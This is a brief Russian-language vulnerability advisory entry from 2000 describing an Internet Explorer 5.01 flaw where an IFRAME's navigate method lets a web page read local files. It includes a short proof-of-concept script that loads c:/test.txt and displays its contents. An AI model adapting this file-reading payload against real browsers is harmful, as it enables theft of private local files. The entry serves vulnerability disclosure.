Lucene search

K
securityvulnsBUGTRAQSECURITYVULNS:VULN:242
HistoryJun 07, 2000 - 12:00 a.m.

Очередная дырка javascript в IE

2000-06-0700:00:00
BUGTRAQ
vulners.com
9

Сочетание метода navigate с IFRAME позволяет обратиться к локальным файлам.
<IFRAME ID="I1"></IFRAME>
<SCRIPT for=I1 event="NavigateComplete2(b)">
alert("Here is your file:\n"+b.document.body.innerText);
</SCRIPT>
<SCRIPT>
I1.navigate("file://c:/test.txt");
setTimeout('I1.navigate("file://c:/test.txt")',1000);
</SCRIPT>

CPENameOperatorVersion
internet explorereq5.01